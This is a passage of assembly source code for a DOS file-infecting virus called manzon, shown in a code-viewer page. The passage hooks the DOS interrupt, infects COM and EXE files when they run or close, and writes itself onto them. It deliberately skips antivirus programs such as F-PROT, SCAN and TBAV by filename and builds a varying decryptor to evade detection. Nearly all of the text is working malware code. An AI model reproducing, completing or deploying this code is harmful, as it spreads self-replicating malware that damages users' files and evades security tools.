📄 manzon.asm
字号:
Rand5b db ?
db 02eh,0feh,004h,090h ; inc byte ptr cs:[si]; nop
db 02eh,0feh,00ch,090h ; dec byte ptr cs:[si]; nop
db 02eh,0f6h,01ch,090h ; neg byte ptr cs:[si]; nop
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ Following table contains four different ways to increase :+
;+ SI. Used only in the DECode-routine (CCode1). :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
DEcSI db 083h,0c6h,001h,090h ; add si,1; nop
db 046h,033h,0dbh,0f8h ; inc si; xor bx,bx; clc
db 04eh,046h,046h,0f9h ; dec si; inc si; sinc si; stc
db 083h,0c6h,002h,04eh ; add si,2; dec si
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ Other data :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
CLength db ? ; Length of decryptor
db ?
ComExe db 0 ; 0=Com, 1=Exe
buffer db 0c3h ; Buffer contains original 3 bytes of
orgep dw 0 ; COM-file. 03ch (RET) will exit program
; in normal DOS. Used only first time.
buffer2 db 0e9h ; JMP OP-code, used to build COM-jump
entry_p dw 0 ; Entrypoint, part of JMP-instruction
Real_CS dw 0
Real_IP dw 0
Real_SS dw 0
Real_SP dw 0
IPOffs dw 100h ; Start offset (100h for comfiles)
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ INT 21h Entrypoint. Check if virus is calling, and if file :+
;+ should be infected. :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
NewVect:
cmp ax,0DCBAh ; Is virus calling?
jne Notvirus
mov dx,ax
iret
Notvirus:
cli ; Clear Interrupts
cld ; Clear Direction
cmp ah,3eh ; Is file going to be closed?
je Short FileClose
cmp ax,4b00h ; Is file going to be executed?
je Short FileExecute
jmp DoOldInt
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ Following code is called when a file is going to be executed. :+
;+ The file will be opened, and then closed. When the file is :+
;+ closed, the virus will call itself by INT21/3Eh, and the file :+
;+ will be infected. Pretty smart, eh? :) :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
FileExecute:
pusha
mov ax,3d00h ; Open file for ReadOnly
int 21h
mov bx,ax ; Filehandle in bx
mov ah,3eh
int 21h ; Close file (infect file :))
popa
jmp DoOldInt
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ Following code is called when a file is going to be closed. :+
;+ The code uses INT2F/1220h to get the adress of JFT-entry, :+
;+ and then INT2F/1216h to get adress of SFT. :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
FileClose:
cmp bx,5 ; Is it a standard device?
jb DoOldInt
push ds
push es
pusha
push bx
mov ax,1220h ; Table in es:di
int 2fh
mov ax,1216h
mov bl,byte ptr es:[di]
int 2fh
pop bx
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ This is a very poor way to check the 2 first characters in a :+
;+ filename, but the asciicode will look nice =) :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
mov ax,word ptr es:[di+20h]
xchg al,ah
add ax,0302h
cmp ax,'F-' + 0302h ; Don't infect F-PROT
je short Skip_Infect
cmp ax,'SC' + 0302h ; Don't infect SCAN
je short Skip_Infect
cmp ax,'TB' + 0302h ; Don't infect TB*.* (TBAV)
je short Skip_Infect
cmp ax,'TO' + 0302h ; Don't infect TOOLKIT
je short Skip_Infect
cmp ax,'FV' + 0302h ; Don't infect FV386
je short Skip_Infect
cmp ax,'FI' + 0302h ; Don't infect FINDVIRU
je short Skip_Infect
cmp ax,'VI' + 0302h ; Don't infect VI*.*
je short Skip_Infect
cmp ax,'K-' + 0302h ; Don't infect R.L's stuff :)
je short Skip_Infect
Check_Com:
cmp word ptr es:[di+28h],'OC'
jne short Check_Exe
cmp byte ptr es:[di+2ah],'M'
jne short Check_Exe
or byte ptr es:[di+2],2 ; Set R&W Access
call Infect_Com
Check_Exe:
cmp word ptr es:[di+28h],'XE'
jne short Skip_Infect
cmp byte ptr es:[di+2ah],'E'
jne short Skip_Infect
or byte ptr es:[di+2],2 ; Set R&W Access
call Infect_Exe
Skip_Infect:
popa
pop es
pop ds
jmp DoOldInt
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ Infect COM-file :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
Infect_Com:
push cs
pop ds
mov ax,4202h ; Go to EOF
xor cx,cx
cwd
int 21h ; Get filelength in AX
push ax
mov ax,4200h ; Go to SOF
xor cx,cx
cwd
int 21h
mov ah,3fh ; Read the 3 first bytes
mov cx,3
mov dx,offset buffer
int 21h
pop ax ; Get Filelength
sub ax,[orgep] ; Virus entrypoint, if file
cmp ax,filecodelength+100h ; is infected
jnb short LooksOk
cmp ax,filecodelength-10h
jb short LooksOk
jmp short DontInfect
LooksOk:
mov ax,4202h ; Go to EOF
xor cx,cx
cwd
int 21h
cmp ax,62000 ; Is file small enough?
jnb short DontInfect
sub ax,3 ; Make the first 3 bytes
mov word ptr ds:[buffer2+1],ax ; (jmp to eof (viruscode))
mov [IPOffs],100h ; Tell that offset is 100h
push bx
call WriteVirus
pop bx
mov ax,4200h ; Move to SOF
xor cx,cx
cwd
int 21h
mov ah,40h ; Write first 3 bytes
mov cx,3
mov dx,offset buffer2
int 21h
DontInfect:
ret
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ Infect EXE-file :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
Infect_Exe:
push cs
pop ds
mov [File_H],bx
mov ax,4200h ; Go to SOF
xor cx,cx
cwd
int 21h
mov ah,3fh
mov cx,19h ; Size of EXE-header
mov dx,offset EXE_Header
int 21h
cmp word ptr ds:[EXE_Sig],'MZ' ; Be sure it's a real EXE.
je short ItIsAnExe
cmp word ptr ds:[EXE_Sig],'ZM'
je short ItIsAnExe
jmp short DontInfect
ItIsAnExe:
cmp byte ptr ds:[EXE_Win],40h ; Is it a NE-EXE?
je short DontInfect ; Don't infect.
xor eax,eax
xor ebx,ebx
xor ecx,ecx
les ax,dword ptr ds:[EXE_IP] ; get CS:IP in ES:AX
mov ds:Real_CS,es
mov ds:Real_IP,ax
push ax ; Save IP
push es ; Save CS
les ax,dword ptr ds:[EXE_SS] ; get SS:SP in AX:ES
mov ds:Real_SS,ax
mov ds:Real_SP,es
push es
pop bx ; SP in BX
shl eax,4 ; Build real SS:SP in EBX
add eax,ebx
pop cx ; Get CS in CX
pop bx ; Get IP in BX
shl ecx,4 ; Build real CS:IP in ECX
add ecx,ebx
sub eax,ecx ; EAX = SS:SP-CS:IP
cmp eax,(filecodelength+400)
jnb short NotInfected
cmp eax,filecodelength
jb short NotInfected
jmp SkipInfect
NotInfected:
xor eax,eax
mov bx,[File_H]
mov ax,4202h ; Go to EOF
xor cx,cx
cwd
int 21h ; Get filelength in dx:ax
xor ecx,ecx
xor ebx,ebx
mov cx, word ptr ds:[EXE_Siz] ; Get Siz/512 from header
mov bx, word ptr ds:[EXE_Mod] ; Get Siz mod 512 from header
shl ecx,9 ; Mul 512
add ecx,ebx ; Build Real memsize
mov bx,dx
shl ebx,16
add ebx,eax ; Build filesize in EBX
cmp ecx,ebx ; Is whole file loaded?
jb SkipInfect ; Nope, skip infect
xor ecx,ecx
push ax
pop cx ; Low word in cx
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -